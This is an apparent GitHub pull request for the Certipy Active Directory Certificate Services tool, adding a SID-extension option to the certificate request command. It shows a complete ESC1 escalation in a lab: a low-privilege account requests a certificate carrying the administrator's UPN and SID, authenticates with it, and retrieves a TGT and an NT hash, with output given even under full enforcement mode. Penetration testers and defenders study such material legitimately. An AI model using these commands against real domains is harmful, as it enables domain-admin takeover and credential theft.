search

ly4k / Certipy

Tool for Active Directory Certificate Services enumeration and abuse
MIT License
2.43k stars 333 forks source link

add-sidextension-functionality-to-comply-with-AD-CS-Full-Enforcement-… #140

Closed vikerup closed 1 year ago

vikerup commented 1 year ago

Add sidextension functionality to comply with AD-CS Full Enforcement mode

certipy req -u test-lowpriv@domain.local -p <pw> -ca CA01-CA -template ESC1 -target-ip 192.168.5.213 -dc-ip 192.168.5.200 -upn administrator -sidextension S-1-5-21-364857334-1705982952-2011365673-500
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 34
[*] Got certificate with UPN 'administrator'
[*] Certificate object SID is 'S-1-5-21-364857334-1705982952-2011365673-500'
[*] Saved certificate and private key to 'administrator.pfx'

certipy auth -pfx administrator.pfx -domain domain.local
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@domain.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@domain.local': **************************:********************************

On DC:

PS C:\> Get-ItemPropertyValue -Path 'HKLM:\SYSTEM\CurrentControlSet\services\kdc' -Name  StrongCertificateBindingEnforcement
2
ly4k commented 1 year ago

Added in latest release. Thank you though!